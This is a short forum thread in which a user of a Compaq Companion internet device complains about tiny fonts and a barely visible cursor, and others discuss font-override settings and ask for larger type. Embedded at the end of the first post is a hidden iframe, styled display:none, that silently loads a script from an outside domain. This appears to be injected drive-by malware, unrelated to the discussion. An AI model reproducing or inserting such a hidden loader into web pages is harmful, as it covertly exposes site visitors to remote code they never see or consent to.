+ Reply to Thread

Fonts Too Small -- Can't Even See Blinking Cursor

On older versions of this website, my Compaq Companion Internet Device automatically converted your pages to larger font sizes (for my more-than-middle-age eyes), but since the latest upgrade, all I get is a tiny text size, where I really have to strain to read things.

The blinking cursor is almost invisible on my LCD display screen.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Not Necessarily Too Good To Be True

In the browser you are using, are there any settings to override a website's font settings to use ones you set? I know it's doable with Netscape and IE. What browser are you using?
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

AFAIK, the browser is proprietary to Compaq and/or MSN Companion. (It certainly isn't standard IE or Netscape.)

I just noticed that the format of this Site News/Ideas Forum (including the "Post a Reply" page) has been adjusted to fit the width of my internet device's LCD screen, although I'm sure that I had to scroll to the right just moments ago on the general Discussion Forum.

When I just returned to the Discussion Forum, it also fit the width of my LCD Screen.

I checked my settings, and I did previously select a larger size font override, but there's a disclaimer on that page which states that the text size override setting will not work properly on all websites.

Please at least consider emboldening the blinking cursor on the "Post a Reply" page? (I keep losing sight of it.)

I-300 Novice

Larger Type Fonts

I second the vote,,larger and clearer type fonts. The sphi300.com site has you beat on that item.
    Ahmed V. Ismail
    A Smartphone Addict